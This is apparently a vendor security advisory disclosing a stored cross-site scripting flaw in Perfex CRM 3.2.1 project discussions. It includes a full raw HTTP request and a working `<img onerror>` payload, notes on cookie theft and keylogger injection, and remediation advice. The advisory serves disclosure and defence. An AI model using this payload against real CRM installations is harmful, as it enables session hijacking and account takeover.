Need an urgent support?

Call: +1 302 556 8229

Stored Cross-Site Scripting in Perfex CRM 3.2.1 Project Discussions

A Stored Cross-Site Scripting (XSS) vulnerability has been identified in the Project Discussions Module of Perfex CRM. This issue permits authenticated client users to inject malicious JavaScript payloads into the discussion description. Consequently, the injected code is executed whenever another user views the discussion. This vulnerability poses significant security risks, including session hijacking, phishing attacks, and the potential for complete account compromise. It is critical to address this vulnerability promptly to safeguard user data and ensure system integrity.


Post Request:

POST /perfex/clients/project/2 HTTP/1.1
Host: 192.168.1.11
Content-Length: 173
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://192.168.1.11
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.11/perfex/clients/project/2?group=project_discussions
Accept-Encoding: gzip, deflate, br
Cookie: contact_language=english; csrf_cookie_name=80389ebf9f4a421a35838e8b8fa60994; sp_session=vcki9i2pek4meo4qhpc5m5r8urefusof
Connection: keep-alive

csrf_token_name=80389ebf9f4a421a35838e8b8fa60994&project_id=2&action=new_discussion&subject=Testing+Discussion&description=%26lt%3Bimg+src%3Dx+onerror%3Dalert%281%29%26gt%3B

Affected Endpoint

POST /perfex/clients/project/{project_id} HTTP/1.1

Proof-of-Concept (PoC)

  • Client Logs In to Perfex CRM.
  • Navigate to any project and then click on the discussion tab. Example URL:/clients/project/{project_id]?group=project_discussions.
  • Creates a new discussion and submits the following XSS payload in the Description field:
    <img src=x onerror=alert(1)>

Impact

  • Attackers can steal admin session cookies via JavaScript
  • Automatic Execution: Unlike click-based XSS, this payload triggers instantly when the admin views the page.
  • Full Account Takeover: Inject a keylogger to capture admin input.

Root Cause Analysis

Perfex CRM fails to sanitize user input in the contract discussion section properly.

  1. Expected Behavior: User input should be HTML encoded or filtered for JavaScript execution.
  2. Actual Behavior: The system renders user input as raw HTML, leading to stored XSS.
  3. Flawed HTML Entity Decoding: The system decodes < and > back into < >, allowing stored JavaScript execution.
  • Sanitize User Input: Apply htmlspecialchars() or strip_tags() on user-submitted comments.
  • Use Content Security Policy (CSP): Implement CSP rules to block inline JavaScript execution.
  • Enable XSS Protection in CodeIgniter: Use $this->security->xss_clean($input) before rendering data.
  • Validate & Escape Output Properly: Ensure all user-generated content is escaped before being displayed.

The development team has been informed of the identified vulnerability. The developers have confirmed the issue, and an official patch is currently pending release. Github Link For This Advisory.

Written by

Bytium Team

Bytium is a global information technology company aim to empower business with hassle-free various IT services including general IT support to advanced cybersecurity services for affordable price.